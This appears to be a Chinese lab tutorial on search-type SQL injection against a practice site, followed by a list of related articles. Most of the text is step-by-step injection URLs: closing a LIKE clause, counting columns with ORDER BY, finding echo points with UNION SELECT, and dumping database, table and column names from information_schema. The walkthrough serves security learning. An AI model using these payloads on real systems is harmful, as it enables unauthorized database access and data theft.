sql_lab之sqli中的搜索型注入

搜索型注入

原理是运用模糊查询:

select * from users where username like '%a%'

1.找到具有模糊查询的搜索框的注入点

2.构造闭合

因为模糊查询的代码是

select * from users where username like '%a%'

所以应该

鱼%’ -- s

判断构造闭合的函数是否正确

鱼%' and 1=1 -- s

http://www.wsdc.com/views/search_p.php?keyword=鱼%' and 1=1 -- s

http://www.wsdc.com/views/search_p.php?keyword=鱼%' and 1=2 -- s

证明闭合成功

3.查询字段数

http://www.wsdc.com/views/search_p.php?keyword=鱼%' order by 10 -- s

http://www.wsdc.com/views/search_p.php?keyword=鱼%' order by 5 -- s

http://www.wsdc.com/views/search_p.php?keyword=鱼%' order by 7 -- s

http://www.wsdc.com/views/search_p.php?keyword=鱼%' order by 8 -- s

所以说字段数为7

4.union联合查询,判断回显点

http://www.wsdc.com/views/search_p.php?keyword=鱼%' union select 1,2,3,4,5,6,7 -- s

所以说回显点为2和6

5.查询数据库

http://www.wsdc.com/views/search_p.php?keyword=鱼%' union select 1,database(),3,4,5,6,7 -- s

6.查询表名

http://www.wsdc.com/views/search_p.php?keyword=鱼%' union select 1,database(),3,4,5,group_concat(table_name) ,7 from information_schema.tables where table_schema="food_db" -- s

7.查询字段

http://www.wsdc.com/views/search_p.php?keyword=鱼%' union select 1,database(),3,4,5,group_concat(column_name) ,7 from information_schema.columns where table_schema="food_db" and table_name="collection" -- s

相关推荐

  1. sqllabs1-7sql注入

    2023-12-26 11:32:06       15 阅读
  2. sql注入字符注入

    2023-12-26 11:32:06       23 阅读
  3. sql_labsqlipost注入

    2023-12-26 11:32:06       28 阅读

最近更新

  1. TCP协议是安全的吗?

    2023-12-26 11:32:06       18 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2023-12-26 11:32:06       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2023-12-26 11:32:06       18 阅读
  4. 通过文章id递归查询所有评论(xml)

    2023-12-26 11:32:06       20 阅读

热门阅读

  1. MySQL中的like模糊查询

    2023-12-26 11:32:06       46 阅读
  2. Springboot学习

    2023-12-26 11:32:06       48 阅读
  3. 蛋白分离纯化方法|蛋白质纯化--卡梅德生物

    2023-12-26 11:32:06       43 阅读
  4. 随记-SQLAlchemy ORM 梳理

    2023-12-26 11:32:06       38 阅读
  5. python区块链简单模拟【04】

    2023-12-26 11:32:06       33 阅读